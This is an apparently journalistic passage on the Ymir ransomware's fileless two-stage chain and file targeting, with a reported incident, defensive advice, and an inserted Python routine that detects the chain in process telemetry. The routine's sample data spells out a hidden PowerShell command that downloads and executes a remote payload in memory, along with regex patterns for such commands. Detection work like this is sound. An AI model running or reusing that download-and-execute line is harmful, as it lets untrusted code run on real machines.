Unmasking the New Ymir Ransomware: Stealthy Memory Exploits Targeting Corporate Networks
of stealthy in-memory exploits, combined with selective file encryption and malicious routines executed before payload deployment, resulting in the evasion of intrusion detection.”
Ymir’s Modus Operandi:
Ymir utilizes fileless execution through script-based launchers and payloads hidden within the victim’s computer memory.
These techniques render traditional signature-based defensive measures quite ineffective.
Because Ymir is memory-resident, it must encrypt files during its first execution: it disappears from system memory after a reboot, leaving few traces behind.
This lends it a stealthy profile that aids in sneaking past various intrusion detection systems.
The Stealth Matrix:
Ymir typically follows a two-stage attack process.
The first stage involves a seemingly benign executable (.exe), built with AutoIt (a freeware automation language), that unpacks and decrypts a PowerShell script.
The script then downloads a secondary payload from a remote server and executes it directly in memory.
This modus operandi evades detection, as the malware never writes the secondary payload to disk.
The second stage is more unusual: Ymir prioritizes encrypting corporate file types such as .docx, .xlsx, and .pptx.
In a departure from typical ransomware behavior, it avoids encrypting system files, whose corruption would alert administrators through system errors.
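As an added example (not from the original article), a small detection routine a defender could run over process-creation telemetry to flag the stage-one behaviour described above: a PowerShell process started by an AutoIt-compiled executable that fetches content from a remote host and runs it in memory. The event shape, field names, the assumed AutoIt file description and all sample events are constructed for illustration.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {   # stage-one pattern: AutoIt-compiled launcher spawning a hidden PowerShell download cradle
        "ParentImage": r"C:\Users\alice\Downloads\invoice_viewer.exe",
        "ParentDescription": "AutoIt v3 Script",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c "
                       "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2')\"",
    },
    {   # benign: a backup script run from a file on disk
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentDescription": "Windows Explorer",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {   # benign-looking: downloads to disk, nothing is executed from memory
        "ParentImage": r"C:\Program Files\Vendor\updater.exe",
        "ParentDescription": "Vendor Updater",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command Invoke-WebRequest https://vendor.example/manifest.json -OutFile m.json",
    },
]

# Indicators that only mean something in combination (any one alone is common in admin scripts).
DOWNLOAD = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I)
IN_MEMORY = re.compile(r"\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly", re.I)
LAUNCH_FLAGS = re.compile(r"-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-e(ncodedcommand)?\b|-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I)

def score_event(ev):
    """Return the list of reasons an event matches the stage-one pattern (empty if none)."""
    if "powershell" not in ev["Image"].lower():
        return []
    cmd = ev["CommandLine"]
    reasons = []
    if DOWNLOAD.search(cmd) and IN_MEMORY.search(cmd):
        reasons.append("remote content executed in memory")        # payload never touches disk
    if LAUNCH_FLAGS.search(cmd):
        reasons.append("hidden/no-profile launch flags")
    if "autoit" in ev.get("ParentDescription", "").lower():       # assumed default description of AutoIt builds
        reasons.append("parent is an AutoIt-compiled executable")
    return reasons

def find_suspicious(events, min_reasons=2):
    """Events carrying at least min_reasons indicators, as (index, reasons) pairs."""
    scored = [(i, score_event(ev)) for i, ev in enumerate(events)]
    return [(i, r) for i, r in scored if len(r) >= min_reasons]

if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(reasons)}")
```

Requiring two or more indicators keeps ordinary download-to-disk or script-from-file launches (events 1 and 2) out of the alert queue while the combined launcher chain (event 0) is surfaced.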
Real-World Impact:
A large-scale IT company recently fell victim to an Ymir ransomware attack.
More than 10TB of data, including personal files and vital company databases, was encrypted overnight.
Although the company had strengthened its security measures, the intrusion went undetected because of the sophisticated tactics Ymir employs.
Advice and Precautions:
Cybersecurity experts suggest a multi-fold approach to deal with threats like Ymir.
Deploying advanced endpoint detection and response (EDR) tooling capable of detecting anomalies in system behavior should receive priority.
Enterprises should adopt prevention techniques such as regular patching of software, restricting PowerShell use, and staff education on phishing scams.
References:
1. Russian cybersecurity vendor Kaspersky: https://www.kaspersky.com/about/press-releases/2021ymir-ransomware
Follow-Up Reading:
1. Advanced endpoint detection and response (EDR) measures: https://www.gartner.com/en/information-technology/glossary/endpoint-detection-and-response-edr
2. The importance of regular software patching: https://www.csoonline.com/article/3235944/why-patching-is-still-a-problem-and-how-to-fix-it.html
3. How to identify and avoid phishing scams: https://www.nist.gov/blogs/cybersecurity-insights/avoiding-phishing-attacks